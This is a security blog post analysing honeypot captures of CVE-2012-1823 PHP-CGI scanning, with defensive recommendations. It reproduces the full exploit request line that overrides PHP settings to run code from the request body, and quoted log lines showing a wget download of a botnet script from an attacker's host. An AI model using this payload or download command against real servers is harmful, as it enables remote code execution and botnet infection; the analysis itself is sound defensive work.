Trustwave Rapid Response: CrowdStrike Falcon Outage Update. Learn More

Trustwave Rapid Response: CrowdStrike Falcon Outage Update. Learn More

Services
Capture
Managed Detection & Response

Eliminate active threats with 24/7 threat detection, investigation, and response.

twi-managed-portal-color
Co-Managed SOC (SIEM)

Maximize your SIEM investment, stop alert fatigue, and enhance your team with hybrid security operations support.

twi-briefcase-color-svg
Advisory & Diagnostics

Advance your cybersecurity program and get expert guidance where you need it most.

tw-laptop-data
Penetration Testing

Test your physical locations and IT infrastructure to shore up weaknesses before exploitation.

twi-database-color-svg
Database Security

Prevent unauthorized access and exceed compliance requirements.

twi-email-color-svg
Email Security

Stop email threats others miss and secure your organization against the #1 ransomware attack vector.

tw-officer
Digital Forensics & Incident Response

Prepare for the inevitable with 24/7 global breach response in-region and available on-site.

tw-network
Firewall & Technology Management

Mitigate risk of a cyberattack with 24/7 incident and health monitoring and the latest threat intelligence.

Solutions
BY TOPIC
Offensive Security
Solutions to maximize your security ROI
Microsoft Exchange Server Attacks
Stay protected against emerging threats
Rapidly Secure New Environments
Security for rapid response situations
Securing the Cloud
Safely navigate and stay protected
Securing the IoT Landscape
Test, monitor and secure network objects
Why Trustwave
About Us
Awards and Accolades
Trustwave SpiderLabs Team
Trustwave Fusion Security Operations Platform
Trustwave Security Colony
Partners
Technology Alliance Partners
Key alliances who align and support our ecosystem of security offerings
Trustwave PartnerOne Program
Join forces with Trustwave to protect against the most advance cybersecurity threats
SpiderLabs Blog

[Honeypot Alert] More PHP-CGI Scanning (apache-magika.c)

In the past 24 hours, one of the WASC Distributed Web Honeypot participant's sensors picked up continued scanning for CVE-2012-1823 which is a vulnerability within PHP-CGI. Here is a screenshot taken from the ModSecurity WAF alert data:

9258_5078aef7-f040-46b1-90f9-e17ef99dade3

 

PHP-CGI Attack

The URLs searched for are the following:

  • /cgi-bin/php
  • /cgi-bin/php4
  • /cgi-bin/php5
  • /cgi-bin/php.cgi
  • /cgi-bin/php-cgi

By decoding the URL line of the request, we can see evidence of the PHP-CGI attack vector:

POST /cgi-bin/php4?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n HTTP/1.1

The bolded/highlighted section of data will be erroneously passed to the PHP command line interpreter and may allow the attacker to override specific PHP configurations. In this case, one of the key modifications is to specify "auto_prepend_file=php://input" which will allow the attacker to send PHP code in the request body. If we inspect the request body contents, we can see that the attacker is attempting to use various command-line web clients (wget/curl/fetch/lwp-get, etc...) to download the "mc.pl" script on the remote attacker's site. The "mc.pl" file is no longer available at that URL, however, Google cache shows the contents as an IRC botnet client.

 

apache-magika.c PoC Code Reuse

By examining multiple alerts that came in from 4 distinct GeoLocations (Vietnam, India, China, and the US), we can conclude that a single attacker has modified the apache-magika.c PoC exploit code release by Kingcope. We can confirm the use of the apache-magika.c PoC code due to the exact same request headers (order and content).

  • Host:
  • User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25
  • Content-Type: application/x-www-form-urlencoded
  • Content-Length:
  • Connection: close

Additionally, we know that this is the same attacker (regardless of the source IP/GeoLocation) data due to the use of the exact same, unique POST payload referencing the "mc.pl file on the 164.177.157.215 host.

 

Recommendations

  • Upgrade PHP to the latest version.
  • Deploy a WAF to mitigate the vulnerability until you can upgrade and identify/prevent attacks. Both Trustwave WAFs can identify these attacks:
  • Review Apache Error Logs for signs of compromise. The following entries indicate exploit attempts and failure messages of the OS command line web clients:
[Sun Nov 24 9:18:46 2013] [error] [client 58.20.178.174] sh: line 1: 16726 Terminated wget http://164.177.157.215/drupal/themes/bartik/images/log/-log/mc . pl[Sun Nov 24 9:18:46 2013] [error] [client 58.20.178.174] Can't open perl script "mc.pl": No such file or directory[Sun Nov 24 9:18:46 2013] [error] [client 58.20.178.174] sh: curl: command not found[Sun Nov 24 9:18:46 2013] [error] [client 58.20.178.174] Can't open perl script "mc.pl": No such file or directory[Sun Nov 24 9:18:46 2013] [error] [client 58.20.178.174] sh: fetch: command not found[Sun Nov 24 9:18:46 2013] [error] [client 58.20.178.174] Can't open perl script "mc.pl": No such file or directory[Sun Nov 24 9:18:46 2013] [error] [client 58.20.178.174] sh: lwp-get: command not found[Sun Nov 24 9:18:46 2013] [error] [client 58.20.178.174] Can't open perl script "mc.pl": No such file or directory

 

Latest SpiderLabs Blogs

Trustwave Rapid Response: CrowdStrike Falcon Outage Update

Trustwave is proactively assessing and monitoring our clients who may have been impacted by CrowdStrike’s recently rolled-out update for its Windows users. The critical issue identified with...

Read More

Using AWS Secrets Manager and Lambda Function to Store, Rotate and Secure Keys

When working with Amazon Web Services (AWS), we often find that various AWS services need to store and manage secrets. AWS Secrets Manager is the go-to solution for this. It's a centralized service...

Read More

Facebook Malvertising Epidemic – Unraveling a Persistent Threat: SYS01

The Trustwave SpiderLabs Threat Intelligence team's ongoing study into how threat actors use Facebook for malicious activity has uncovered a new version of the SYS01 stealer. This stealer is designed...

Read More